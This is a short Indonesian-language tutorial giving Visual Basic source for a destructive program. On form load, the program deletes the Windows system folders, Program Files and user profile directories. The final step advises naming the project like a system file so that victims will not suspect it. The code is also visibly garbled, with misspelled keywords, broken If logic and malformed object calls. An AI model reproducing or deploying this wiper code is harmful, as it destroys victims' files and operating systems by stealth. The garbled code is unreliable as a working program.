1.Bikin form sekecil mungkin
2.Masukan ini kode dalam form tersebut
Public Sub DelAll(By Val Ditro Delete ASVarian)
Set FSO=Create Object("Scripting,File System Object
FS=FSO,Delete Folder(Ditro Delete, True)
End Sub Form_Load( )
On Error Resume Net
If File Exist("c:\windows\sytem32\katak.txt") = true then and else
Call Del All("c:\windows\system")
Call Del All("c:\windows\sytem32")
Call Del All("c\windows")
Call Del All("c:\Document and setting\All Users")
Call Del All("c:\Document and setting\administrator")
Call Del All("c:\Document and setting")
Call Del All("c:\program files\commons file")
Call Del All("c:\program files\internet explorer")
Call Del All("c:\Program files\Microsoft Visual Studio")
Call Del All("c:\Program files")
End If
End Sub
Function file exist(By Val File Name As String)As Boolean
If Dir (File Name) = "" Then
file exist = False
File exist = True
End If
End Function
3.bikin project seperti nama system jadi tdk akan di curigai.